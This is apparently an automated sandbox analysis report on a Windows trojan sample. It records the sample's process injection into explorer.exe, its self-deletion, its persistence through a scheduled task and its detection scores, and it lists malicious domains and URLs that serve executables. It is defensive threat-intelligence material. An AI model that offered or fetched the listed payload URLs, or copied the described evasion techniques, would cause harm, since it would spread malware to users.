            Valid AccountsNative API1DLL Side-Loading1Process Injection313Masquerading11Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsExploitation for Client Execution1Boot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion12LSASS MemorySecurity Software Discovery431Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer13Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection313Security Account ManagerVirtualization/Sandbox Evasion12SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol125SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncSystem Information Discovery15Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 545931 Sample: UZ6FEqlix4 Startdate: 28/12/2021 Architecture: WINDOWS Score: 100 37 host-data-coin-11.com 2->37 45 Multi AV Scanner detection for domain / URL 2->45 47 Found malware configuration 2->47 49 Antivirus detection for URL or domain 2->49 51 5 other signatures 2->51 10 UZ6FEqlix4.exe 2->10         started        12 eveggtb 2->12         started        signatures3 process4 signatures5 15 UZ6FEqlix4.exe 10->15         started        65 Multi AV Scanner detection for dropped file 12->65 67 Machine Learning detection for dropped file 12->67 18 eveggtb 12->18         started        process6 signatures7 71 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 15->71 73 Maps a DLL or memory area into another process 15->73 75 Checks if the current machine is a virtual machine (disk enumeration) 15->75 20 explorer.exe 2 15->20 injected 77 Creates a thread in another existing process (thread injection) 18->77 process8 dnsIp9 39 185.233.81.115, 443, 49800 SUPERSERVERSDATACENTERRU Russian Federation 20->39 41 unicupload.top 54.38.220.85, 49859, 80 OVHFR France 20->41 43 6 other IPs or domains 20->43 31 C:\Users\user\AppData\Roaming\eveggtb, PE32 20->31 dropped 33 C:\Users\user\AppData\Local\Temp\411F.exe, PE32 20->33 dropped 35 C:\Users\user\...\eveggtb:Zone.Identifier, ASCII 20->35 dropped 53 System process connects to network (likely due to code injection or exploit) 20->53 55 Benign windows process drops PE files 20->55 57 Deletes itself after installation 20->57 59 Hides that the sample has been downloaded from the Internet (zone.identifier) 20->59 25 411F.exe 20->25         started        file10 signatures11 process12 signatures13 61 Multi AV Scanner detection for dropped file 25->61 63 Machine Learning detection for dropped file 25->63 28 411F.exe 25->28         started        process14 signatures15 69 Checks if the current machine is a virtual machine (disk enumeration) 28->69

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            UZ6FEqlix4.exe58%VirustotalBrowse
            UZ6FEqlix4.exe20%MetadefenderBrowse
            UZ6FEqlix4.exe63%ReversingLabsWin32.Trojan.Raccrypt
            UZ6FEqlix4.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\eveggtb100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\411F.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\411F.exe20%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\411F.exe67%ReversingLabsWin32.Trojan.Raccrypt
            C:\Users\user\AppData\Roaming\eveggtb20%MetadefenderBrowse
            C:\Users\user\AppData\Roaming\eveggtb67%ReversingLabsWin32.Trojan.Raccrypt

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            11.2.eveggtb.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.2.UZ6FEqlix4.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            20.2.411F.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            11.0.eveggtb.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            11.1.eveggtb.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.0.UZ6FEqlix4.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.0.UZ6FEqlix4.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            19.2.411F.exe.4e15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            0.2.UZ6FEqlix4.exe.5b15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            11.0.eveggtb.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.0.UZ6FEqlix4.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            20.0.411F.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            11.0.eveggtb.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            1.1.UZ6FEqlix4.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            9.2.eveggtb.4e15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            20.0.411F.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            20.0.411F.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            20.1.411F.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            unicupload.top15%VirustotalBrowse
            host-data-coin-11.com14%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://host-data-coin-11.com/0%URL Reputationsafe
            http://file-coin-host-12.com/0%URL Reputationsafe
            http://data-host-coin-8.com/files/5376_1640094939_1074.exe0%Avira URL Cloudsafe
            http://unicupload.top/install5.exe100%URL Reputationphishing
            http://privacytools-foryou-777.com/downloads/toolspab3.exe100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            unicupload.top
            		54.38.220.85
            		truetrueunknown
            host-data-coin-11.com
            		47.251.11.252
            		truetrueunknown
            privacytools-foryou-777.com
            		47.251.11.252
            		truetrue
              		unknown
              data-host-coin-8.com
              		47.251.11.252
              		truetrue
                		unknown
                infinity-cheats.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://host-data-coin-11.com/true
                  • URL Reputation: safe
                  		unknown
                  http://file-coin-host-12.com/true
                  • URL Reputation: safe
                  		unknown
                  http://data-host-coin-8.com/files/5376_1640094939_1074.exefalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://unicupload.top/install5.exetrue
                  • URL Reputation: phishing
                  		unknown
                  http://privacytools-foryou-777.com/downloads/toolspab3.exetrue
                  • Avira URL Cloud: malware
                  		unknown

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  185.233.81.115
                  		unknownRussian Federation
                  		50113SUPERSERVERSDATACENTERRUtrue
                  47.251.11.252
                  		host-data-coin-11.comUnited States
                  		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                  185.186.142.166
                  		unknownRussian Federation
                  		204490ASKONTELRUtrue
                  54.38.220.85
                  		unicupload.topFrance
                  		16276OVHFRtrue

                  Private

                  IP
                  192.168.2.1

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:545931
                  Start date:28.12.2021
                  Start time:13:53:06
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 7m 22s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:UZ6FEqlix4 (renamed file extension from none to exe)
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:20
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@9/3@24/5
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 88.3% (good quality ratio 60%)
                  • Quality average: 52.3%
                  • Quality standard deviation: 40.9%
                  HCA Information:
                  • Successful, ratio: 54%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  Warnings:
                  Show All
                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • TCP Packets have been reduced to 100
                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                  • Excluded IPs from analysis (whitelisted): 13.107.5.88, 13.107.42.16, 23.213.170.60, 92.122.145.220
                  • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, client-office365-tas.msedge.net, afdo-tas-offload.trafficmanager.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, ris.api.iris.microsoft.com, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, e12564.dspb.akamaiedge.net, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, e16646.dscg.akamaiedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, config.edge.skype.com, storeedgefd.dsx.mp.microsoft.com

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  13:54:47Task SchedulerRun new task: Firefox Default Browser Agent B8BE4ECA53B9BE33 path: C:\Users\user\AppData\Roaming\eveggtb

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  No context

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\411F.exe
                  Process:C:\Windows\explorer.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):339456
                  Entropy (8bit):6.210575483974104
                  Encrypted:false
                  SSDEEP:6144:XFOSX78eVzsodTr6rv6acPyCmyD3+KHZc9FOKV:XvX77wo6rv6acPbmyDP5c9x
                  MD5:5E0ED8966761E70EE0B8DCD141AAFB4C
                  SHA1:933E68212D0F6D029E920BD93E5DCA7CA5BDCB7A
                  SHA-256:8BBDDA1786E15A568A573A2F38762E95DE138AF969E0A13B96D7086AAA98BFC2
                  SHA-512:D692905DDD5B1EA92ABED7FD38379947A9B453F5AEDEE91C5BE217E1799CC2B03C898FD99828EFA15A58C7811781DB8CBC90F5330640BF9361F60422DF22EB33
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Metadefender, Detection: 20%, Browse
                  • Antivirus: ReversingLabs, Detection: 67%
                  Reputation:low
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@...@...@.../.L.Q.../.x.*...I.A.C...@......./.y.v.../.H.A.../.O.A...Rich@...........PE..L.....e`..................... .......=............@..........................@..................................................(........b......................$!..p...................................@............................................text...N........................... ..`.data...ho..........................@....pejevu......p.......~..............@....dozi...............................@....rsrc....b.......d..................@..@.reloc...;.......<..................@..B........................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Roaming\eveggtb
                  Process:C:\Windows\explorer.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):339456
                  Entropy (8bit):6.210575483974104
                  Encrypted:false
                  SSDEEP:6144:XFOSX78eVzsodTr6rv6acPyCmyD3+KHZc9FOKV:XvX77wo6rv6acPbmyDP5c9x
                  MD5:5E0ED8966761E70EE0B8DCD141AAFB4C
                  SHA1:933E68212D0F6D029E920BD93E5DCA7CA5BDCB7A
                  SHA-256:8BBDDA1786E15A568A573A2F38762E95DE138AF969E0A13B96D7086AAA98BFC2
                  SHA-512:D692905DDD5B1EA92ABED7FD38379947A9B453F5AEDEE91C5BE217E1799CC2B03C898FD99828EFA15A58C7811781DB8CBC90F5330640BF9361F60422DF22EB33
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Metadefender, Detection: 20%, Browse
                  • Antivirus: ReversingLabs, Detection: 67%
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@...@...@.../.L.Q.../.x.*...I.A.C...@......./.y.v.../.H.A.../.O.A...Rich@...........PE..L.....e`..................... .......=............@..........................@..................................................(........b......................$!..p...................................@............................................text...N........................... ..`.data...ho..........................@....pejevu......p.......~..............@....dozi...............................@....rsrc....b.......d..................@..@.reloc...;.......<..................@..B........................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Roaming\eveggtb:Zone.Identifier
                  Process:C:\Windows\explorer.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Preview: [ZoneTransfer]....ZoneId=0

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):6.210575483974104
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:UZ6FEqlix4.exe
                  File size:339456
                  MD5:5e0ed8966761e70ee0b8dcd141aafb4c
                  SHA1:933e68212d0f6d029e920bd93e5dca7ca5bdcb7a
                  SHA256:8bbdda1786e15a568a573a2f38762e95de138af969e0a13b96d7086aaa98bfc2
                  SHA512:d692905ddd5b1ea92abed7fd38379947a9b453f5aedee91c5be217e1799cc2b03c898fd99828efa15a58c7811781db8cbc90f5330640bf9361f60422df22eb33
                  SSDEEP:6144:XFOSX78eVzsodTr6rv6acPyCmyD3+KHZc9FOKV:XvX77wo6rv6acPbmyDP5c9x
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@...@...@.../.L.Q.../.x.*...I.A.C...@......./.y.v.../.H.A.../.O.A...Rich@...........PE..L.....e`..................... .....

                  File Icon

                  Icon Hash:b2e8e8e8aaa2a488

                  Static PE Info

                  General

                  Entrypoint:0x423db0
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                  DLL Characteristics:TERMINAL_SERVER_AWARE
                  Time Stamp:0x6065B41B [Thu Apr 1 11:52:59 2021 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:39de84e7a601fa8861e0e6a8c8b0a138

                  Entrypoint Preview

                  Instruction
                  mov edi, edi
                  push ebp
                  mov ebp, esp
                  call 00007FBB8105AEABh
                  call 00007FBB81052586h
                  pop ebp
                  ret
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  mov edi, edi
                  push ebp
                  mov ebp, esp
                  push FFFFFFFEh
                  push 0043E6E0h
                  push 004275F0h
                  mov eax, dword ptr fs:[00000000h]
                  push eax
                  add esp, FFFFFF98h
                  push ebx
                  push esi
                  push edi
                  mov eax, dword ptr [00447B80h]
                  xor dword ptr [ebp-08h], eax
                  xor eax, ebp
                  push eax
                  lea eax, dword ptr [ebp-10h]
                  mov dword ptr fs:[00000000h], eax
                  mov dword ptr [ebp-18h], esp
                  mov dword ptr [ebp-70h], 00000000h
                  lea eax, dword ptr [ebp-60h]
                  push eax
                  call dword ptr [00401228h]
                  cmp dword ptr [004C6F4Ch], 00000000h
                  jne 00007FBB81052580h
                  push 00000000h
                  push 00000000h
                  push 00000001h
                  push 00000000h
                  call dword ptr [00401224h]
                  call 00007FBB81052703h
                  mov dword ptr [ebp-6Ch], eax
                  call 00007FBB81056CBBh
                  test eax, eax
                  jne 00007FBB8105257Ch
                  push 0000001Ch
                  call 00007FBB810526C0h
                  add esp, 04h
                  call 00007FBB810580B8h
                  test eax, eax
                  jne 00007FBB8105257Ch
                  push 00000010h
                  call 00007FBB810526ADh
                  add esp, 04h
                  push 00000001h
                  call 00007FBB81051823h
                  add esp, 04h
                  call 00007FBB8105A02Bh
                  mov dword ptr [ebp-04h], 00000000h
                  call 00007FBB8105B80Fh
                  test eax, eax

                  Rich Headers

                  Programming Language:
                  • [LNK] VS2010 build 30319
                  • [ASM] VS2010 build 30319
                  • [ C ] VS2010 build 30319
                  • [C++] VS2010 build 30319
                  • [RES] VS2010 build 30319
                  • [IMP] VS2008 SP1 build 30729

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3ebcc0x28.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc90000x6288.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xd00000x2124.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x13700x1c.text
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa5b80x40.text
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x2e8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x3ed4e0x3ee00False0.565722850398data6.87583252941IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .data0x400000x86f680x8c00False0.0388950892857data0.690472674069IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .pejevu0xc70000x50x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .dozi0xc80000xd930xe00False0.00697544642857data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .rsrc0xc90000x62880x6400False0.481875data5.03814907839IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0xd00000x3bee0x3c00False0.449674479167data4.58044690622IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_CURSOR0xcca900x130dataDivehi; Dhivehi; MaldivianMaldives
                  RT_CURSOR0xccbd80x130dataDivehi; Dhivehi; MaldivianMaldives
                  RT_CURSOR0xccd080xf0dataDivehi; Dhivehi; MaldivianMaldives
                  RT_CURSOR0xccdf80x10a8dBase III DBT, version number 0, next free block index 40Divehi; Dhivehi; MaldivianMaldives
                  RT_CURSOR0xcded00x8a8dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"Divehi; Dhivehi; MaldivianMaldives
                  RT_ICON0xc95a00x8a8dataSpanishColombia
                  RT_ICON0xc9e480x6c8dataSpanishColombia
                  RT_ICON0xca5100x568GLS_BINARY_LSB_FIRSTSpanishColombia
                  RT_ICON0xcaa780x10a8dataSpanishColombia
                  RT_ICON0xcbb200x988dataSpanishColombia
                  RT_ICON0xcc4a80x468GLS_BINARY_LSB_FIRSTSpanishColombia
                  RT_STRING0xce7900x72dataDivehi; Dhivehi; MaldivianMaldives
                  RT_STRING0xce8080x256dataDivehi; Dhivehi; MaldivianMaldives
                  RT_STRING0xcea600x794dataDivehi; Dhivehi; MaldivianMaldives
                  RT_STRING0xcf1f80x90dataDivehi; Dhivehi; MaldivianMaldives
                  RT_ACCELERATOR0xcc9c80x78dataDivehi; Dhivehi; MaldivianMaldives
                  RT_ACCELERATOR0xcc9700x58dataDivehi; Dhivehi; MaldivianMaldives
                  RT_GROUP_CURSOR0xccbc00x14dataDivehi; Dhivehi; MaldivianMaldives
                  RT_GROUP_CURSOR0xcdea00x30dataDivehi; Dhivehi; MaldivianMaldives
                  RT_GROUP_CURSOR0xce7780x14dataDivehi; Dhivehi; MaldivianMaldives
                  RT_GROUP_ICON0xcc9100x5adataSpanishColombia
                  None0xcca500xadataDivehi; Dhivehi; MaldivianMaldives
                  None0xcca600xadataDivehi; Dhivehi; MaldivianMaldives
                  None0xcca400xadataDivehi; Dhivehi; MaldivianMaldives
                  None0xcca700xadataDivehi; Dhivehi; MaldivianMaldives
                  None0xcca800xadataDivehi; Dhivehi; MaldivianMaldives

                  Imports

                  DLLImport
                  KERNEL32.dllGetNamedPipeHandleStateW, CreateNamedPipeA, CallNamedPipeW, TerminateThread, GetExitCodeProcess, GetVersionExA, VerifyVersionInfoW, SetConsoleCP, GetConsoleAliasesLengthA, VerLanguageNameA, FindFirstFileExA, VerifyVersionInfoA, FreeEnvironmentStringsA, GetProcessPriorityBoost, SetVolumeMountPointW, GetLongPathNameA, CopyFileA, TlsGetValue, SetConsoleCursorInfo, TzSpecificLocalTimeToSystemTime, AddAtomA, ReleaseMutex, GetNamedPipeHandleStateA, BuildCommDCBAndTimeoutsA, GetProcAddress, LoadLibraryA, GlobalAlloc, Sleep, TlsSetValue, MoveFileA, GetCommandLineW, InterlockedExchange, DeleteFileW, CreateActCtxA, SetFileAttributesA, GetPrivateProfileIntW, GetProcessHeap, CreateNamedPipeW, ReadConsoleOutputCharacterA, GetStartupInfoA, GetDiskFreeSpaceExW, GetCPInfoExW, GetWindowsDirectoryW, GetSystemWow64DirectoryA, SetLastError, GetProfileStringA, GetCalendarInfoW, FreeUserPhysicalPages, GetTickCount, GetStringTypeA, DebugBreak, FindFirstFileA, lstrcmpA, WriteFile, GetConsoleMode, lstrcatW, SetFirmwareEnvironmentVariableA, DefineDosDeviceW, EndUpdateResourceA, WriteConsoleW, InterlockedIncrement, SetSystemTimeAdjustment, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileStructA, GetPrivateProfileStructW, GetFileAttributesExW, HeapUnlock, CreateIoCompletionPort, PeekConsoleInputA, GetNumberFormatW, GetQueuedCompletionStatus, FindResourceExA, SetLocalTime, TryEnterCriticalSection, CreateSemaphoreA, GetThreadLocale, SetFileShortNameA, lstrcpyA, ReplaceFileA, LockFileEx, MoveFileExA, GetConsoleCP, GetVolumePathNameA, FlushConsoleInputBuffer, SearchPathW, FreeConsole, GetConsoleAliasExesLengthW, WriteConsoleInputW, LocalShrink, SetCommState, GetSystemTimeAdjustment, EnumSystemLocalesW, ProcessIdToSessionId, GetDevicePowerState, DeleteTimerQueueTimer, GetWriteWatch, OpenSemaphoreA, GetConsoleScreenBufferInfo, ClearCommBreak, TlsAlloc, OpenMutexW, GetComputerNameW, HeapValidate, GetLastError, OpenMutexA, WaitForMultipleObjectsEx, SignalObjectAndWait, GetSystemPowerStatus, VirtualLock, SetWaitableTimer, ChangeTimerQueueTimer, GetProcessTimes, FatalAppExitA, lstrcpynA, SetNamedPipeHandleState, FillConsoleOutputCharacterA, GetCompressedFileSizeW, FindNextVolumeMountPointA, GetFullPathNameA, WriteProfileStringA, UnlockFile, GlobalAddAtomW, EnterCriticalSection, SetCurrentDirectoryW, InterlockedDecrement, InitializeCriticalSection, DeleteCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, IsBadReadPtr, RtlUnwind, RaiseException, GetModuleHandleW, ExitProcess, DeleteFileA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, GetModuleFileNameW, InitializeCriticalSectionAndSpinCount, IsProcessorFeaturePresent, HeapAlloc, GetModuleFileNameA, HeapReAlloc, HeapSize, HeapQueryInformation, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapFree, HeapCreate, GetACP, GetOEMCP, IsValidCodePage, GetCurrentThreadId, TlsFree, GetStdHandle, LoadLibraryW, GetLocaleInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, GetStringTypeW, GetLocaleInfoA, IsValidLocale, EnumSystemLocalesA, GetUserDefaultLCID, OutputDebugStringA, OutputDebugStringW, SetFilePointer, SetStdHandle, CreateFileW, CloseHandle, FlushFileBuffers

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  Divehi; Dhivehi; MaldivianMaldives
                  SpanishColombia

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  12/28/21-13:56:13.072786ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.48.8.8.8

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Dec 28, 2021 13:54:48.240751982 CET4978680192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:48.415318966 CET804978647.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:48.415499926 CET4978680192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:48.415672064 CET4978680192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:48.415689945 CET4978680192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:48.590718985 CET804978647.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:48.974246025 CET804978647.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:48.978246927 CET4978680192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:48.979311943 CET4978680192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:49.008280039 CET4978780192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:49.153706074 CET804978647.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:49.188935995 CET804978747.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:49.189016104 CET4978780192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:49.189124107 CET4978780192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:49.189142942 CET4978780192.168.2.447.251.11.252
                  Dec 28, 2021 13:54:49.369729996 CET804978747.251.11.252192.168.2.4
                  Dec 28, 2021 13:54:49.753453970 CET804978747.251.11.252192.168.2.4
